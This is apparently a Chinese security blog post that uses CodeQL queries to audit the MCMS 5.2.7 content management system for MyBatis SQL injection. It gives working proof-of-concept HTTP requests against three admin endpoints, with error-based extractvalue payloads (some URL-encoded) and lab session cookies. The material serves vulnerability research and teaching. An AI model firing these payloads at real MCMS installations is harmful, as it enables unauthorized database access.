开始
mcms 版本 5.2.7 https://github.com/ming-soft/MCMS 这个cms还是使用了很多常用第三方库的 ![image.png]
本次文章只寻找sql注入,我们看到他采用的是MyBatis,在Mybatis中存在sql注入的原因就是用$使用拼接SQL语句,所以我们先看看他的xml文件 全局搜索${,发现下面一个文件存在使用$进行拼接(当然还有,放太多就不好了.....)
net\mingsoft\cms\dao\ICategoryDao.xml 发现categoryDao.xml里设置的queryChildren()方法是存在sql注入的(通过参数id拼接导致sql注入)
创建codeql数据库
codeql database create ../mcms-db -l java --command="mvn clean install"
codeql编写
寻找queryChildren()的位置 通过Call.getCaller()获取调用此调用的可调用对象 意思就是获取调用该方法的对象
import java
from Call call,Method method
where call.getCallee()=method and
method.hasName("queryChildren")
select call.getCaller()
可以发现他把原来定义好的方法也查出来了
由此需要做个过滤,找到Mapping方法
import java
Annotation findmapping(Annotation ann) {
result= ann and
ann.getType().hasQualifiedName("org.springframework.web.bind.annotation", "RequestMapping") or
ann.getType().hasQualifiedName("org.springframework.web.bind.annotation", "PostMapping") and result=ann or
ann.getType().hasQualifiedName("org.springframework.web.bind.annotation", "GetMapping") and result=ann
}
from Call call,Method method
where call.getCallee()=method and
method.hasName("queryChildren")
select findmapping(call.getCaller().getAnAnnotation())
找到maping方法后,需要找到对应路由 通过getAnAnnotation()方法得到注解
import java
Annotation findmapping(Annotation ann) {
result= ann and
ann.getType().hasQualifiedName("org.springframework.web.bind.annotation", "RequestMapping") or
ann.getType().hasQualifiedName("org.springframework.web.bind.annotation", "PostMapping") and result=ann or
ann.getType().hasQualifiedName("org.springframework.web.bind.annotation", "GetMapping") and result=ann
}
Annotation filtration (Annotation ann){
result=ann and
ann.getType().hasQualifiedName("org.springframework.web.bind.annotation", "RequestMapping")
}
from Call call,Method method
where call.getCallee()=method and
method.hasName("queryChildren")
select
findmapping(call.getCaller().getAnAnnotation()),
filtration(call.getCaller().getAnAnnotation().getTarget().(Method).getDeclaringType().getAnAnnotation()).getValue("value").toString().replaceAll("\"", "").replaceAll("${ms.manager.path}","ms" )+
findmapping(call.getCaller().getAnAnnotation()).getValue("value").toString().replaceAll("\"","")
接着获取该方法对应的文件 通过getFile().getLocation()获取
import java
Annotation findmapping(Annotation ann) {
result= ann and
ann.getType().hasQualifiedName("org.springframework.web.bind.annotation", "RequestMapping") or
ann.getType().hasQualifiedName("org.springframework.web.bind.annotation", "PostMapping") and result=ann or
ann.getType().hasQualifiedName("org.springframework.web.bind.annotation", "GetMapping") and result=ann
}
Annotation filtration (Annotation ann){
result=ann and
ann.getType().hasQualifiedName("org.springframework.web.bind.annotation", "RequestMapping")
}
from Call call,Method method,Expr src
where call.getCallee()=method and
method.hasName("queryChildren")
select
findmapping(call.getCaller().getAnAnnotation()),
filtration(call.getCaller().getAnAnnotation().getTarget().(Method).getDeclaringType().getAnAnnotation()).getValue("value").toString().replaceAll("\"", "").replaceAll("${ms.manager.path}","ms" )+
findmapping(call.getCaller().getAnAnnotation()).getValue("value").toString().replaceAll("\"",""),
call.getFile().getLocation()
总共有4个路由,可以发现都在后台,(当然前台也就几个路由),开始对路由进行审计
后台批量更新模板
/ms/cms/category/updateTemplate() 审计代码发现他会先对id进行查询,然后再进行子查询,而getById()方法用的是预处理,所以我们再构造闭合语句的时候是通不过getById()方法的,由此,这个路由也不存在
柳暗花明
在审了一个路由后都以失败告终,然后继续下去审的时候就发现了漏洞
后台更新分类处存在sql注入
/ms/cms/category/update
POST /ms/cms/category/update.do HTTP/1.1
Host: 10.232.135.172:8081
Content-Length: 713
Pragma: no-cache
Accept: application/json, text/plain, */*
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
token: null
Content-Type: application/x-www-form-urlencoded
Origin: http://10.232.135.172:8081
Referer: http://10.232.135.172:8081/ms/cms/category/form.do?id=1329257213283344385&childId=undefined
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-HK;q=0.9,zh-CN;q=0.8,en-US;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: JSESSIONID=7107C57040871B40ABF3ADABB58D3BA0; rememberMe=HFSSyf7Hiyv3HyJRlC3efbc2yG2Xv/gOah/5fg9SLzqGtoHB7MxNFoOZL1CsWJq5gyDBq70XPFjKCuFfnSla/CDvY8W3PTAJI5HGUVmcYiQ69z2i2Pt8nPClg5kKC8wQuBYuMgdW1yL6pBWJuDc1kCia/MsztSUbSMZMEOzekF6ztJfz6s+iF03j9KAyqQQ+PDst+NeeAOqdzdS9D4iRwb9i7dNyDDr+WLh1RxcocU7gdEX43y8J/SxmekvdkwKJZMJRK8OJG/8mJDPSX+KZ6Vmov43bY1cCHF1Se5Bx33tpfJXgQbe/7MMgIR+uYCBvaZ3NE3r95rWSZ2nq/lM/Wvhr1vosEBejFtw24gUgJL1vtMdu9Nde2kJ/Q+98OQoHBRB+m6U7ditzPe1PIyvCB52jNq8lqrA+FoyOWmaI/f8Lr5eDnUAeh+HvtxqXhtZ40db+gfWyeRkBKDuQGfBpPsnFQZzgbBz6zM7gpqt8DT0sgxxQpBzdvMJKdHPNUXywFYlm+cmL3sOdt0FXsANv9/CdDj+8PUN0q2oZZvqRU6sgTI68bzWcgvyNWukk7BKn06kO/Z9H/05o/onsR+W4LU8JPtXQjbE0b71uKSeDxH6zrHvqSvGVOJovU4efRoZ6FG7i2MMzr2OFLXp3Qj1l+4ROJYpt4Ni7wRbPkZuKew+D24Cjs9iJq+hA/gA/w3kVwHa8rISxKl445yiPScvNBjmqeUyTBJfMw2w3c8505q2Q/KP1X8Dl2Pk7jEr0MCXOoLztZidMGUbr+9XzVKBSMJ/qlBCH6WxCuR9mDo2PYJWSSI5iv9ZLyhrupeKWjhtpPmfMjEeHAAA6DnxNjApHpvZn30IKOhks9qKB+aDFZtInJo6HHUkKMx0NdzfKzjShCGk5WBNekTsQTGfdJ3mqsyitfXgbKNBfnBEfOujtcB04xBcK4T1TKOUkRFlReMoBXXJJOu07zd/f8RD0KMeVLJvZ2MRQLDfQT6eCPCEnHu9XGoN9uWH8Qq7Ute/PEd8Rwby1GWNKxucGB8aIMqJId6MVU0lW54+QcXKi41QV6LnvZ3TbxPJUgSFmzjat0rtHXJK8PZ+JCN4T4j9abEzl/o2qfGIkIUl3WsmodrBLjcubUFOtwFFxekbVrxoklaQ/K5okbU2APFjkZgD4NYTRmwi2rM1SvXPOVLlA5qh4f3xLaM9rltNAu6k7A1fz9DI2p4K2XZRauxnPAAp2WqDleRADMy4izl9LZLXBBoUBf/g7vo8x4I70M7uvp4m4lom1G8RvjC/b6AmA5FBXiWBlxsnMVIhV6PjTJQcDlp7hZDljXgZ6PHM7ODN7rZVqiHHgi7gr/kp/lId2q60=; pageno_cookie=1
Connection: close
createBy=57&createDate=2020-11-19%2010%3A56%3A31&del=0&id=1329257213283344385'&remarks=&updateBy=57&updateDate=2021-10-21%2008%3A39%3A21&order=&categoryTitle=%E5%85%AC%E5%8F%B8%E4%BA%A7%E5%93%81&categoryPinyin=product&categoryId=&categoryType=1&categorySort=0&categoryListUrl=product-list.htm&categoryUrl=product-detail.htm&categoryKeyword=&categoryDescrip=123&categoryImg=%5B%5D&categoryDiyUrl=&mdiyModelId=&dictId=&categoryFlag=nav&categoryPath=%2Fproduct&categoryParentIds=&leaf=false&topId=0&typepath=%2Fproduct&flag=nav&typeid=1329257213283344385&typelitpic=%5B%5D&typetitle=%E5%85%AC%E5%8F%B8%E4%BA%A7%E5%93%81&typelink=%2Fproduct%2Findex.html&typekeyword=&parentids=&typeleaf=false&typeurl=&typedescrip=
可以发现他的报错回显回显出了queryChildren()方法里的部门sql语句,由此根据语句闭合
根据sql语句闭合
id=1329257213283344385','1'))%20and%20extractvalue(1,concat(0x7e,(select(database()))))%20and(find_in_set('1329257213283344385
poc:
POST /ms/cms/category/update.do HTTP/1.1
Host: 10.232.135.172:8081
Content-Length: 813
Pragma: no-cache
Accept: application/json, text/plain, */*
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
token: null
Content-Type: application/x-www-form-urlencoded
Origin: http://10.232.135.172:8081
Referer: http://10.232.135.172:8081/ms/cms/category/form.do?id=1329257213283344385&childId=undefined
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-HK;q=0.9,zh-CN;q=0.8,en-US;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: JSESSIONID=7107C57040871B40ABF3ADABB58D3BA0; rememberMe=HFSSyf7Hiyv3HyJRlC3efbc2yG2Xv/gOah/5fg9SLzqGtoHB7MxNFoOZL1CsWJq5gyDBq70XPFjKCuFfnSla/CDvY8W3PTAJI5HGUVmcYiQ69z2i2Pt8nPClg5kKC8wQuBYuMgdW1yL6pBWJuDc1kCia/MsztSUbSMZMEOzekF6ztJfz6s+iF03j9KAyqQQ+PDst+NeeAOqdzdS9D4iRwb9i7dNyDDr+WLh1RxcocU7gdEX43y8J/SxmekvdkwKJZMJRK8OJG/8mJDPSX+KZ6Vmov43bY1cCHF1Se5Bx33tpfJXgQbe/7MMgIR+uYCBvaZ3NE3r95rWSZ2nq/lM/Wvhr1vosEBejFtw24gUgJL1vtMdu9Nde2kJ/Q+98OQoHBRB+m6U7ditzPe1PIyvCB52jNq8lqrA+FoyOWmaI/f8Lr5eDnUAeh+HvtxqXhtZ40db+gfWyeRkBKDuQGfBpPsnFQZzgbBz6zM7gpqt8DT0sgxxQpBzdvMJKdHPNUXywFYlm+cmL3sOdt0FXsANv9/CdDj+8PUN0q2oZZvqRU6sgTI68bzWcgvyNWukk7BKn06kO/Z9H/05o/onsR+W4LU8JPtXQjbE0b71uKSeDxH6zrHvqSvGVOJovU4efRoZ6FG7i2MMzr2OFLXp3Qj1l+4ROJYpt4Ni7wRbPkZuKew+D24Cjs9iJq+hA/gA/w3kVwHa8rISxKl445yiPScvNBjmqeUyTBJfMw2w3c8505q2Q/KP1X8Dl2Pk7jEr0MCXOoLztZidMGUbr+9XzVKBSMJ/qlBCH6WxCuR9mDo2PYJWSSI5iv9ZLyhrupeKWjhtpPmfMjEeHAAA6DnxNjApHpvZn30IKOhks9qKB+aDFZtInJo6HHUkKMx0NdzfKzjShCGk5WBNekTsQTGfdJ3mqsyitfXgbKNBfnBEfOujtcB04xBcK4T1TKOUkRFlReMoBXXJJOu07zd/f8RD0KMeVLJvZ2MRQLDfQT6eCPCEnHu9XGoN9uWH8Qq7Ute/PEd8Rwby1GWNKxucGB8aIMqJId6MVU0lW54+QcXKi41QV6LnvZ3TbxPJUgSFmzjat0rtHXJK8PZ+JCN4T4j9abEzl/o2qfGIkIUl3WsmodrBLjcubUFOtwFFxekbVrxoklaQ/K5okbU2APFjkZgD4NYTRmwi2rM1SvXPOVLlA5qh4f3xLaM9rltNAu6k7A1fz9DI2p4K2XZRauxnPAAp2WqDleRADMy4izl9LZLXBBoUBf/g7vo8x4I70M7uvp4m4lom1G8RvjC/b6AmA5FBXiWBlxsnMVIhV6PjTJQcDlp7hZDljXgZ6PHM7ODN7rZVqiHHgi7gr/kp/lId2q60=; pageno_cookie=1
Connection: close
createBy=57&createDate=2020-11-19%2010%3A56%3A31&del=0&id=1329257213283344385','1'))%20and%20extractvalue(1,concat(0x7e,(select(database()))))%20and(find_in_set('1329257213283344385&remarks=&updateBy=57&updateDate=2021-10-21%2008%3A39%3A21&order=&categoryTitle=%E5%85%AC%E5%8F%B8%E4%BA%A7%E5%93%81&categoryPinyin=product&categoryId=&categoryType=1&categorySort=0&categoryListUrl=product-list.htm&categoryUrl=product-detail.htm&categoryKeyword=&categoryDescrip=123&categoryImg=%5B%5D&categoryDiyUrl=&mdiyModelId=&dictId=&categoryFlag=nav&categoryPath=%2Fproduct&categoryParentIds=&leaf=false&topId=0&typepath=%2Fproduct&flag=nav&typeid=1329257213283344385&typelitpic=%5B%5D&typetitle=%E5%85%AC%E5%8F%B8%E4%BA%A7%E5%93%81&typelink=%2Fproduct%2Findex.html&typekeyword=&parentids=&typeleaf=false&typeurl=&typedescrip=
后台生成栏目处存在sql注入
/ms/cms/generate/{categoryId}/genernateColumn 查看代码发现该路由并没有对传过去的id进行处理且直接使用了queryChildren()方法 由此构造poc
GET /ms/cms/generate/1',)%23/genernateColumn.do HTTP/1.1
Host: 10.219.65.100:8081
Accept: application/json, text/plain, */*
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36
token: null
Referer: http://10.219.65.100:8081/ms/cms/generate/index.do?
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-HK;q=0.9,zh-CN;q=0.8,en-US;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: JSESSIONID=993DBB80C368CA6D7F334C811A989A8C; rememberMe=RxJYrTEwnf3hD3d9aiBsohqpzie/PoN/1OkwX/+RdELq4cyOqsRzeMtDAiheuhQWbGaBxtG2Phptr6z2rJvaWz3+QA2CRywwDv3Il9Yaujkw5Ti6+QdXsYVF3vSD+qOqmm9E3T2foguN4KHAAwJmHUOulxe1mBLrC2WxlVLh900KntYStdRueVsgj1lyds/M9jI/xtxs+on8IpZUEXH09oAZtGRdrqugM9JQ88UYR5sNoIW+aW11zFFf5XXbaXKu76a80mJXftbs9mPvDUPHrYgzS2S6TT4O2tEWXGXq9O0FU3nj+qCgsxFbPchTZ7lzTahCWj/gevT5LGBGXHe/RXKbFelh99hTg/H9L629LtbLzcPjSkakpOVcD6UZYzOLDXd3btfrB1RDfOqBgLYecRD0EeotEnh2YWv8pLnyQQBiozz2Xy3taru9HE6waXu4DeAg6bhvz6ehk7QXKpPMgZeQU4e/Il/cE/crP0MjSRujexFFrBkljWz3e5rkGb+9FlcHhPm6b8jSzuo2fdp/OZoWXeAf75L287Ey73g5eCELl0gQwf5xn8qRfh4brEXNpd0rnfCrw0a7ZcJtXu7i9pfwjKW2OnSldcpU1aGz3qUGUS1k6Fk+mzEZFhI6RIug3lU7nCp0mdJeG7LpCfK90O7CEW7Wiclj1aIySIFoGbO8n3opzNV5k6HbNT3xBSiQrv/LbjGy1TcpvtmWZmdqZcUoQdZJqHUbRqjzg3ILqwgffvNHxtzeITUEIJdzgfjpEKPg425DaWbGFdUvIoAvCdvrpAKr5wtanMRIyunp4i5mNYQq/G5M/ul7FH9GBNeIR2+Fap23iqBbsEqrNyMTJIH5JW8g//UiwaEAuHlNKI0YT5blnXfuDFEU46mkBkjQ+WRKHq1EZ/U8mak+5mIMnWMMXcZlxkKJykcfPOcdxG91YNYi/jh1VuRyP5cgg2NbViknEN+8X86VfmZ6ocDDna3QckbiNyNsFitC+rOA9HbCA8Hjj+nS8TjSq3H+JQVPOxV+PxL9Xb7gfaiKQrCqzYdzV7y5ri8kJbdz+hO5/O9Ro9Djj826TjnFfSjpl8G7WEcvw3NqCycO3LvWg8PHdZgC11DvSeDW+dqeUykU5uHPz9N0cVfV4NgzjIpDbMxG36nJI8r07cnPv1vlvyAy/yWPtfz4XOXb9ivBLEstPHE/pvj0ia6OsEidTEoqsjYy+R59vO+6ZAbnwAlEopz/GJXxHqsPl0o6qHYV6uY4Bq6gVaAuX1elZrMQWe5rwJEg2r/NZgjHW1eixATIG4M4zabZbYcJABMfAN6wtuD39AGNhbIJhIGA8qfY7TcPm2tlcFOl1hz1P76q1Qc=
Connection: close
同样的道理
/ms/cms/generate/3','1')) and extractvalue(1,concat(0x7e,(select(database())))) and (find_in_set('3/genernateColumn.do
poc:
GET /ms/cms/generate/3','1'))%20and%20%65%78%74%72%61%63%74%76%61%6c%75%65%28%31%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%28%73%65%6c%65%63%74%28%64%61%74%61%62%61%73%65%28%29%29%29%29%29%20and%20(find_in_set('3/genernateColumn.do HTTP/1.1
Host: 10.219.65.100:8081
Accept: application/json, text/plain, */*
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36
token: null
Referer: http://10.219.65.100:8081/ms/cms/generate/index.do?
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-HK;q=0.9,zh-CN;q=0.8,en-US;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: JSESSIONID=993DBB80C368CA6D7F334C811A989A8C; rememberMe=RxJYrTEwnf3hD3d9aiBsohqpzie/PoN/1OkwX/+RdELq4cyOqsRzeMtDAiheuhQWbGaBxtG2Phptr6z2rJvaWz3+QA2CRywwDv3Il9Yaujkw5Ti6+QdXsYVF3vSD+qOqmm9E3T2foguN4KHAAwJmHUOulxe1mBLrC2WxlVLh900KntYStdRueVsgj1lyds/M9jI/xtxs+on8IpZUEXH09oAZtGRdrqugM9JQ88UYR5sNoIW+aW11zFFf5XXbaXKu76a80mJXftbs9mPvDUPHrYgzS2S6TT4O2tEWXGXq9O0FU3nj+qCgsxFbPchTZ7lzTahCWj/gevT5LGBGXHe/RXKbFelh99hTg/H9L629LtbLzcPjSkakpOVcD6UZYzOLDXd3btfrB1RDfOqBgLYecRD0EeotEnh2YWv8pLnyQQBiozz2Xy3taru9HE6waXu4DeAg6bhvz6ehk7QXKpPMgZeQU4e/Il/cE/crP0MjSRujexFFrBkljWz3e5rkGb+9FlcHhPm6b8jSzuo2fdp/OZoWXeAf75L287Ey73g5eCELl0gQwf5xn8qRfh4brEXNpd0rnfCrw0a7ZcJtXu7i9pfwjKW2OnSldcpU1aGz3qUGUS1k6Fk+mzEZFhI6RIug3lU7nCp0mdJeG7LpCfK90O7CEW7Wiclj1aIySIFoGbO8n3opzNV5k6HbNT3xBSiQrv/LbjGy1TcpvtmWZmdqZcUoQdZJqHUbRqjzg3ILqwgffvNHxtzeITUEIJdzgfjpEKPg425DaWbGFdUvIoAvCdvrpAKr5wtanMRIyunp4i5mNYQq/G5M/ul7FH9GBNeIR2+Fap23iqBbsEqrNyMTJIH5JW8g//UiwaEAuHlNKI0YT5blnXfuDFEU46mkBkjQ+WRKHq1EZ/U8mak+5mIMnWMMXcZlxkKJykcfPOcdxG91YNYi/jh1VuRyP5cgg2NbViknEN+8X86VfmZ6ocDDna3QckbiNyNsFitC+rOA9HbCA8Hjj+nS8TjSq3H+JQVPOxV+PxL9Xb7gfaiKQrCqzYdzV7y5ri8kJbdz+hO5/O9Ro9Djj826TjnFfSjpl8G7WEcvw3NqCycO3LvWg8PHdZgC11DvSeDW+dqeUykU5uHPz9N0cVfV4NgzjIpDbMxG36nJI8r07cnPv1vlvyAy/yWPtfz4XOXb9ivBLEstPHE/pvj0ia6OsEidTEoqsjYy+R59vO+6ZAbnwAlEopz/GJXxHqsPl0o6qHYV6uY4Bq6gVaAuX1elZrMQWe5rwJEg2r/NZgjHW1eixATIG4M4zabZbYcJABMfAN6wtuD39AGNhbIJhIGA8qfY7TcPm2tlcFOl1hz1P76q1Qc=
Connection: close
后台生成文章处存在sql注入
/ms/cms/generate/{columnId}/generateArticle
可以发现和上面的生成栏目一个意思,差别不大
poc:
POST /ms/cms/generate/3','1'))%20and%20%65%78%74%72%61%63%74%76%61%6c%75%65%28%31%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%28%73%65%6c%65%63%74%28%64%61%74%61%62%61%73%65%28%29%29%29%29%29%20and%20(find_in_set('3/generateArticle.do HTTP/1.1
Host: 10.219.65.100:8081
Content-Length: 19
Pragma: no-cache
Accept: application/json, text/plain, */*
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36
token: null
Content-Type: application/x-www-form-urlencoded
Origin: http://10.219.65.100:8081
Referer: http://10.219.65.100:8081/ms/cms/generate/index.do?
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-HK;q=0.9,zh-CN;q=0.8,en-US;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: JSESSIONID=993DBB80C368CA6D7F334C811A989A8C; rememberMe=RxJYrTEwnf3hD3d9aiBsohqpzie/PoN/1OkwX/+RdELq4cyOqsRzeMtDAiheuhQWbGaBxtG2Phptr6z2rJvaWz3+QA2CRywwDv3Il9Yaujkw5Ti6+QdXsYVF3vSD+qOqmm9E3T2foguN4KHAAwJmHUOulxe1mBLrC2WxlVLh900KntYStdRueVsgj1lyds/M9jI/xtxs+on8IpZUEXH09oAZtGRdrqugM9JQ88UYR5sNoIW+aW11zFFf5XXbaXKu76a80mJXftbs9mPvDUPHrYgzS2S6TT4O2tEWXGXq9O0FU3nj+qCgsxFbPchTZ7lzTahCWj/gevT5LGBGXHe/RXKbFelh99hTg/H9L629LtbLzcPjSkakpOVcD6UZYzOLDXd3btfrB1RDfOqBgLYecRD0EeotEnh2YWv8pLnyQQBiozz2Xy3taru9HE6waXu4DeAg6bhvz6ehk7QXKpPMgZeQU4e/Il/cE/crP0MjSRujexFFrBkljWz3e5rkGb+9FlcHhPm6b8jSzuo2fdp/OZoWXeAf75L287Ey73g5eCELl0gQwf5xn8qRfh4brEXNpd0rnfCrw0a7ZcJtXu7i9pfwjKW2OnSldcpU1aGz3qUGUS1k6Fk+mzEZFhI6RIug3lU7nCp0mdJeG7LpCfK90O7CEW7Wiclj1aIySIFoGbO8n3opzNV5k6HbNT3xBSiQrv/LbjGy1TcpvtmWZmdqZcUoQdZJqHUbRqjzg3ILqwgffvNHxtzeITUEIJdzgfjpEKPg425DaWbGFdUvIoAvCdvrpAKr5wtanMRIyunp4i5mNYQq/G5M/ul7FH9GBNeIR2+Fap23iqBbsEqrNyMTJIH5JW8g//UiwaEAuHlNKI0YT5blnXfuDFEU46mkBkjQ+WRKHq1EZ/U8mak+5mIMnWMMXcZlxkKJykcfPOcdxG91YNYi/jh1VuRyP5cgg2NbViknEN+8X86VfmZ6ocDDna3QckbiNyNsFitC+rOA9HbCA8Hjj+nS8TjSq3H+JQVPOxV+PxL9Xb7gfaiKQrCqzYdzV7y5ri8kJbdz+hO5/O9Ro9Djj826TjnFfSjpl8G7WEcvw3NqCycO3LvWg8PHdZgC11DvSeDW+dqeUykU5uHPz9N0cVfV4NgzjIpDbMxG36nJI8r07cnPv1vlvyAy/yWPtfz4XOXb9ivBLEstPHE/pvj0ia6OsEidTEoqsjYy+R59vO+6ZAbnwAlEopz/GJXxHqsPl0o6qHYV6uY4Bq6gVaAuX1elZrMQWe5rwJEg2r/NZgjHW1eixATIG4M4zabZbYcJABMfAN6wtuD39AGNhbIJhIGA8qfY7TcPm2tlcFOl1hz1P76q1Qc=
Connection: close
dateTime=2022-04-18
总结
总的来说,codeql提高了代码审计的效率,不用一个个去debug去调,当然你全局搜索也是一个意思,但是当路由比较多的情况下,你不得不一个个去看,codeql的出现就是为了解决这一麻烦事,这个cms其实还有很多sql注入,就不放出来了,主要是针对codeql语句编写的学习